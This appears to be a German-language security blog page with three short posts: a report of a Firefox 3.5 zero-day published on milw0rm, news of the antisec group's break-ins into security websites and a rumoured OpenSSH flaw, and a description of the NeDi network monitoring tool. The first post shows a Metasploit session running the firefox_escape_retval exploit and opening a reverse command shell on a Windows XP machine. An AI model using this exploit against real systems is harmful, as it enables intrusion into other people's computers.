Gestern wurde bei milw0rm ein 0day Exploit für die aktuelle Version von Firefox 3.5 veröffentlicht.

msf exploit(firefox_escape_retval) > exploit
[*] Exploit running as background job.
msf exploit(firefox_escape_retval) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://192.168.1.102:80/test2
[*] Server started.
[*] Sending Firefox 3.5 escape() Return Value Memory Corruption to 192.168.1.101:2950...
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (192.168.1.102:4444 -> 192.168.1.101:2951)
msf exploit(firefox_escape_retval) > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:ProgrammeMozilla Firefox>

nachdem Heise und andere milw0rm für tot erklärt haben macht die Seite heute einen recht lebhaften Eindruck. Tot gesagte leben länger!

[und doch wieder down]

[und wieder zu erreichen ... was bloß da los?]

Die Gerüchteküche brodelt heftig. Nach dem in der Mailing-Liste full-disclosure drei (bis auf die verwendeten Exploits) gut dokumentierte Einbrüche auf die Server von astalavista.com, ssanz.net und infosec.org.uk veröffentlicht würden, spekuliert man über eine Sicherheitslücke in openssh. Betroffen soll die in Centos/Red Hat Enterprise Linux eingesetzte Version 4.3 sein.

Die Einbrüche in die Server wurden von der antisec Gruppe verübt und richten sich gegen die Server von vermeitlichen Sicherheitsexperten.

Weitere Informationen hier:

astalavista.com hack
infosec.org.uk hack
ssanz.net hack

Nedi ist eine Anwendung zum Monitoring von (Cisco) Netzwerk-Equipment. Die Erkennung erfolgt via LLDP,CDP oder FDP.
Zum sammeln von Information einzelner Geräte wird snmp verwendet. Ein weiteres Feature ist die Backup-Funktion, welche
es ermöglicht Konfigurationen (running-config) zu speichern und zu vergleichen.

Die Installation ist sehr simpel, gute Anleitungen finden sich hier.

Eine Übersicht, was mit nedi alles möglich ist zeigt dieses Video: